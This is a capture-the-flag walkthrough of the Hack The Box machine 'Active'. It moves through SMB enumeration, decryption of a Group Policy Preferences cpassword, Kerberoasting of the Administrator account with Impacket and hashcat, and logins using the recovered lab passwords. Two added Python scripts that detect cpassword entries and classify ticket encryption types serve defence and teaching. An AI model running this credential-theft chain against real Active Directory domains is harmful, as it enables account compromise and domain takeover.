Active
Writeup
After scanning, we know which ports are open, the hostname, and the operating system the host is running.
nmap -sC -sV 10.129.48.58
Starting Nmap 7.95 ( https://nmap.org ) at 2025-12-28 18:13 EST
Nmap scan report for 10.129.48.58
Host is up (0.053s latency).
Not shown: 983 closed tcp ports (reset)
PORT STATE SERVICE VERSION
53/tcp open domain Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1)
| dns-nsid:
|_ bind.version: Microsoft DNS 6.1.7601 (1DB15D39)
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-12-28 23:13:12Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
49157/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49158/tcp open msrpc Microsoft Windows RPC
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows_server_2008:r2:sp1, cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2025-12-28T23:14:05
|_ start_date: 2025-12-28T23:00:30
| smb2-security-mode:
| 2:1:0:
|_ Message signing enabled and required
So we see that port 445 (SMB) is open. Let's examine it with smbmap.
smbmap -H 10.129.48.58
[*] Detected 1 hosts serving SMB
[*] Established 1 SMB connections(s) and 1 authenticated session(s)
[+] IP: 10.129.48.58:445 Name: 10.129.48.58 Status: Authenticated
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
C$ NO ACCESS Default share
IPC$ NO ACCESS Remote IPC
NETLOGON NO ACCESS Logon server share
Replication READ ONLY
SYSVOL NO ACCESS Logon server share
Users NO ACCESS
We can see the permissions of all shares, and we know which share we can access anonymously (Replication). Let's dive deeper into it.
smbmap -H 10.129.48.58 -r Replication --depth 7
________ ___ ___ _______ ___ ___ __ _______
/" )|" \ /" || _ "\ |" \ /" | /""\ | __ "\
(: \___/ \ \ // |(. |_) :) \ \ // | / \ (. |__) :)
\___ \ /\ \/. ||: \/ /\ \/. | /' /\ \ |: ____/
__/ \ |: \. |(| _ \ |: \. | // __' \ (| /
/" \ :) |. \ /: ||: |_) :)|. \ /: | / / \ \ /|__/ \
(_______/ |___|\__/|___|(_______/ |___|\__/|___|(___/ \___)(_______)
-----------------------------------------------------------------------------
SMBMap - Samba Share Enumerator v1.10.7 | Shawn Evans - ShawnDEvans@gmail.com
https://github.com/ShawnDEvans/smbmap
[*] Detected 1 hosts serving SMB
[*] Established 1 SMB connections(s) and 1 authenticated session(s)
[+] IP: 10.129.48.58:445 Name: 10.129.48.58 Status: Authenticated
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
C$ NO ACCESS Default share
IPC$ NO ACCESS Remote IPC
NETLOGON NO ACCESS Logon server share
Replication READ ONLY
./Replication
dr--r--r-- 0 Sat Jul 21 06:37:44 2018 .
dr--r--r-- 0 Sat Jul 21 06:37:44 2018 ..
dr--r--r-- 0 Sat Jul 21 06:37:44 2018 active.htb
./Replication//active.htb
dr--r--r-- 0 Sat Jul 21 06:37:44 2018 .
dr--r--r-- 0 Sat Jul 21 06:37:44 2018 ..
dr--r--r-- 0 Sat Jul 21 06:37:44 2018 DfsrPrivate
dr--r--r-- 0 Sat Jul 21 06:37:44 2018 Policies
dr--r--r-- 0 Sat Jul 21 06:37:44 2018 scripts
./Replication//active.htb/DfsrPrivate
dr--r--r-- 0 Sat Jul 21 06:37:44 2018 .
dr--r--r-- 0 Sat Jul 21 06:37:44 2018 ..
dr--r--r-- 0 Sat Jul 21 06:37:44 2018 ConflictAndDeleted
dr--r--r-- 0 Sat Jul 21 06:37:44 2018 Deleted
dr--r--r-- 0 Sat Jul 21 06:37:44 2018 Installing
./Replication//active.htb/Policies
dr--r--r-- 0 Sat Jul 21 06:37:44 2018 .
dr--r--r-- 0 Sat Jul 21 06:37:44 2018 ..
dr--r--r-- 0 Sat Jul 21 06:37:44 2018 {31B2F340-016D-11D2-945F-00C04FB984F9}
dr--r--r-- 0 Sat Jul 21 06:37:44 2018 {6AC1786C-016F-11D2-945F-00C04fB984F9}
./Replication//active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}
dr--r--r-- 0 Sat Jul 21 06:37:44 2018 .
dr--r--r-- 0 Sat Jul 21 06:37:44 2018 ..
fr--r--r-- 23 Sat Jul 21 06:38:11 2018 GPT.INI
dr--r--r-- 0 Sat Jul 21 06:37:44 2018 Group Policy
dr--r--r-- 0 Sat Jul 21 06:37:44 2018 MACHINE
dr--r--r-- 0 Sat Jul 21 06:37:44 2018 USER
./Replication//active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/Group Policy
dr--r--r-- 0 Sat Jul 21 06:37:44 2018 .
dr--r--r-- 0 Sat Jul 21 06:37:44 2018 ..
fr--r--r-- 119 Sat Jul 21 06:38:11 2018 GPE.INI
./Replication//active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE
dr--r--r-- 0 Sat Jul 21 06:37:44 2018 .
dr--r--r-- 0 Sat Jul 21 06:37:44 2018 ..
dr--r--r-- 0 Sat Jul 21 06:37:44 2018 Microsoft
dr--r--r-- 0 Sat Jul 21 06:37:44 2018 Preferences
fr--r--r-- 2788 Sat Jul 21 06:38:11 2018 Registry.pol
./Replication//active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Microsoft
dr--r--r-- 0 Sat Jul 21 06:37:44 2018 .
dr--r--r-- 0 Sat Jul 21 06:37:44 2018 ..
dr--r--r-- 0 Sat Jul 21 06:37:44 2018 Windows NT
./Replication//active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Microsoft/Windows NT
dr--r--r-- 0 Sat Jul 21 06:37:44 2018 .
dr--r--r-- 0 Sat Jul 21 06:37:44 2018 ..
dr--r--r-- 0 Sat Jul 21 06:37:44 2018 SecEdit
./Replication//active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Microsoft/Windows NT/SecEdit
dr--r--r-- 0 Sat Jul 21 06:37:44 2018 .
dr--r--r-- 0 Sat Jul 21 06:37:44 2018 ..
fr--r--r-- 1098 Sat Jul 21 06:38:11 2018 GptTmpl.inf
./Replication//active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Preferences
dr--r--r-- 0 Sat Jul 21 06:37:44 2018 .
dr--r--r-- 0 Sat Jul 21 06:37:44 2018 ..
dr--r--r-- 0 Sat Jul 21 06:37:44 2018 Groups
./Replication//active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Preferences/Groups
dr--r--r-- 0 Sat Jul 21 06:37:44 2018 .
dr--r--r-- 0 Sat Jul 21 06:37:44 2018 ..
fr--r--r-- 533 Sat Jul 21 06:38:11 2018 Groups.xml
./Replication//active.htb/Policies/{6AC1786C-016F-11D2-945F-00C04fB984F9}
dr--r--r-- 0 Sat Jul 21 06:37:44 2018 .
dr--r--r-- 0 Sat Jul 21 06:37:44 2018 ..
fr--r--r-- 22 Sat Jul 21 06:38:11 2018 GPT.INI
dr--r--r-- 0 Sat Jul 21 06:37:44 2018 MACHINE
dr--r--r-- 0 Sat Jul 21 06:37:44 2018 USER
./Replication//active.htb/Policies/{6AC1786C-016F-11D2-945F-00C04fB984F9}/MACHINE
dr--r--r-- 0 Sat Jul 21 06:37:44 2018 .
dr--r--r-- 0 Sat Jul 21 06:37:44 2018 ..
dr--r--r-- 0 Sat Jul 21 06:37:44 2018 Microsoft
./Replication//active.htb/Policies/{6AC1786C-016F-11D2-945F-00C04fB984F9}/MACHINE/Microsoft
dr--r--r-- 0 Sat Jul 21 06:37:44 2018 .
dr--r--r-- 0 Sat Jul 21 06:37:44 2018 ..
dr--r--r-- 0 Sat Jul 21 06:37:44 2018 Windows NT
./Replication//active.htb/Policies/{6AC1786C-016F-11D2-945F-00C04fB984F9}/MACHINE/Microsoft/Windows NT
dr--r--r-- 0 Sat Jul 21 06:37:44 2018 .
dr--r--r-- 0 Sat Jul 21 06:37:44 2018 ..
dr--r--r-- 0 Sat Jul 21 06:37:44 2018 SecEdit
./Replication//active.htb/Policies/{6AC1786C-016F-11D2-945F-00C04fB984F9}/MACHINE/Microsoft/Windows NT/SecEdit
dr--r--r-- 0 Sat Jul 21 06:37:44 2018 .
dr--r--r-- 0 Sat Jul 21 06:37:44 2018 ..
fr--r--r-- 3722 Sat Jul 21 06:38:11 2018 GptTmpl.inf
SYSVOL NO ACCESS Logon server share
Users NO ACCESS
We can see an interesting file, Groups.xml.
cat Groups.xml
<?xml version="1.0" encoding="utf-8"?>
<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}"><User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="active.htb\SVC_TGS" image="2" changed="2018-07-18 20:46:06" uid="{EF57DA28-5F69-4530-A59E-AAB58578219D}"><Properties action="U" newName="" fullName="" description="" cpassword="edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ" changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0" userName="active.htb\SVC_TGS"/></User>
</Groups>
We have a username and an encrypted password (the cpassword attribute) here. We can use gpp-decrypt to recover the Group Policy Preferences password.
gpp-decrypt edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ
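The Groups.xml above is the classic Group Policy Preferences exposure: the cpassword attribute is AES ciphertext, base64-encoded with its padding stripped, which is why gpp-decrypt can recover it. The scanner below is an added example for this writeup (not code from the original post or from gpp-decrypt) that a defender can run over files pulled from SYSVOL to find such entries; it generalises to the other GPP files that use the same attribute (Services.xml, ScheduledTasks.xml), and the ACCOUNT_ATTRS names for those files are an assumption documented in the code.

```python
"""Scan Group Policy Preferences XML for stored cpassword values (added example,
not from the original post or gpp-decrypt)."""
import base64
import xml.etree.ElementTree as ET

# Constructed sample: the Groups.xml from the Replication share, with its cpassword.
SAMPLE_GROUPS_XML = """<?xml version="1.0" encoding="utf-8"?>
<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}"><User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="active.htb\\SVC_TGS" image="2" changed="2018-07-18 20:46:06" uid="{EF57DA28-5F69-4530-A59E-AAB58578219D}"><Properties action="U" newName="" fullName="" description="" cpassword="edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ" changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0" userName="active.htb\\SVC_TGS"/></User>
</Groups>"""

# Other GPP files name the account differently (assumed attribute names:
# runAs in ScheduledTasks.xml, accountName in Services.xml).
ACCOUNT_ATTRS = ("userName", "runAs", "accountName")


def decode_cpassword(cpassword):
    """Return the raw AES-256-CBC ciphertext behind a cpassword attribute.
    GPP strips the base64 '=' padding, so restore it before decoding
    (gpp-decrypt performs the same fix-up before decrypting)."""
    padded = cpassword + "=" * (-len(cpassword) % 4)
    return base64.b64decode(padded)


def find_gpp_passwords(xml_text):
    """One finding per <Properties> element carrying a non-empty cpassword:
    whose credential it is, whether the blob is whole AES blocks (sanity check
    that it really is a GPP blob), and the account flags that worsen exposure."""
    root = ET.fromstring(xml_text.encode("utf-8"))
    findings = []
    for props in root.iter("Properties"):
        cpw = props.get("cpassword")
        if not cpw:
            continue  # empty cpassword: no password stored for this item
        raw = decode_cpassword(cpw)
        user = next((props.get(a) for a in ACCOUNT_ATTRS if props.get(a)), "<unknown>")
        findings.append({
            "user": user,
            "ciphertext_bytes": len(raw),
            "block_aligned": len(raw) % 16 == 0,
            "never_expires": props.get("neverExpires") == "1",
            "user_cannot_change": props.get("noChange") == "1",
            "disabled": props.get("acctDisabled") == "1",
        })
    return findings
```

On this sample the blob decodes to 64 bytes, four AES blocks, consistent with a UTF-16LE password of up to 31 characters. Since MS14-025 Windows no longer lets administrators create new preferences with a cpassword, but XML files written before the patch stay in SYSVOL until someone deletes them, so a scan like this is the fix's other half.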
After getting the password, we scan the share permissions again with this credential.
smbmap -H 10.129.48.58 -u "SVC_TGS" -p "GPPstillStandingStrong2k18"
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
C$ NO ACCESS Default share
IPC$ NO ACCESS Remote IPC
NETLOGON READ ONLY Logon server share
Replication READ ONLY
SYSVOL READ ONLY Logon server share
Users READ ONLY
We now have read access to more shares. Use smbclient to log in and get the user's flag.
smbclient //10.129.48.58/Users -U"SVC_TGS"%"GPPstillStandingStrong2k18"
We'll use the GetUserSPNs.py script from Impacket to list the SPNs that are associated with normal user accounts. It will also request a TGS ticket for each of them that we can crack offline.
Let's set it up first.
wget https://raw.githubusercontent.com/fortra/impacket/refs/heads/master/examples/GetUserSPNs.py
python3 -m venv myenv
source myenv/bin/activate
pip uninstall impacket
sudo apt remove python3-impacket
python3 -m pip install impacket
Then execute it with Python to request the ticket.
python3 GetUserSPNs.py -request -dc-ip 10.129.48.58 active.htb/SVC_TGS -save -outputfile GetUserSPNs.out
cat GetUserSPNs.out
$krb5tgs$23$*Administrator$ACTIVE.HTB$active.htb/Administrator*$aa80f0c121d7fc1357e88656b901a80b$[...]
Use hashcat to crack it (mode 13100 is Kerberos 5 TGS-REP with etype 23, RC4-HMAC).
hashcat -m 13100 -a 0 GetUserSPNs.out /usr/share/wordlists/rockyou.txt
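The output file is a ticket in the krb5tgs format that GetUserSPNs.py writes, and the etype field in it decides both the hashcat mode and how worried a defender should be: an etype 23 ticket means the DC issued an RC4 ticket for that service account. The parser below is an added example for this writeup (not Impacket or hashcat code); the user, realm, SPN and checksum come from the ticket above, while the encrypted ticket body is a constructed placeholder.

```python
"""Classify a Kerberoast ticket line as written by GetUserSPNs.py -outputfile
(added example for this writeup, not Impacket or hashcat code)."""
import re

# Layout GetUserSPNs.py writes:
#   $krb5tgs$23$*user$REALM$spn*$checksum$edata      (RC4, etype 23)
#   $krb5tgs$17|18$user$REALM$*spn*$checksum$edata   (AES, etype 17/18)
TGS_RE = re.compile(
    r"^\$krb5tgs\$(\d+)\$\*?([^$*]+)\$([^$*]+)\$\*?([^$*]+)\*?\$([0-9a-fA-F]+)\$([0-9a-fA-F]+)$"
)

# etype -> (cipher, hashcat mode, checksum length in hex digits)
ETYPES = {
    23: ("rc4-hmac", 13100, 32),                 # 16-byte HMAC-MD5 checksum
    17: ("aes128-cts-hmac-sha1-96", 19600, 24),  # 12-byte HMAC-SHA1-96
    18: ("aes256-cts-hmac-sha1-96", 19700, 24),
}

# Constructed sample: user/realm/SPN/checksum from the writeup's ticket; the
# edata is a placeholder, not the real encrypted ticket body.
SAMPLE_TGS = ("$krb5tgs$23$*Administrator$ACTIVE.HTB$active.htb/Administrator*"
              "$aa80f0c121d7fc1357e88656b901a80b$" + "00" * 32)


def classify_tgs(line):
    """Parse one krb5tgs line; return its fields plus the hashcat mode, or None
    if the line is not in the GetUserSPNs.py layout."""
    m = TGS_RE.match(line.strip())
    if not m:
        return None
    etype = int(m.group(1))
    cipher, mode, cksum_len = ETYPES.get(etype, ("unknown", None, None))
    return {
        "etype": etype,
        "cipher": cipher,
        "user": m.group(2),
        "realm": m.group(3),
        "spn": m.group(4),
        "hashcat_mode": mode,
        "checksum_ok": cksum_len is not None and len(m.group(5)) == cksum_len,
        # RC4 tickets are the cheap-to-crack case; an AES-only service account
        # with a long random password (or a gMSA) removes this exposure.
        "weak_cipher": etype == 23,
    }
```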
This recovers the Administrator password. Now use this credential to log in with smbclient and get the root flag.
smbclient //10.129.48.58/Users -U"Administrator"%"Ticketmaster????"
